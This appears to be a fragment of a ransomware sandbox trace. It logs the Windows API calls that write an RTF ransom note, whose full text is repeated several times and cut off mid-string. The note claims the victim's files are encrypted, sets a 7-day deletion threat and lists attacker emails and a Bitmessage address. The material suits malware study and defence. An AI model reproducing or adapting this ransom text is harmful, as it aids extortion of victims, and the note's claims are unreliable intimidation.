\\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0300.414] WriteFile (in: hFile=0x2d4, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.415] CloseHandle (hObject=0x2d4) returned 1 [0300.415] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\#readme_eman#.rtf")) returned 0xffffffff [0300.415] GetLastError () returned 0x2 [0300.415] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.415] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.415] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.415] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to 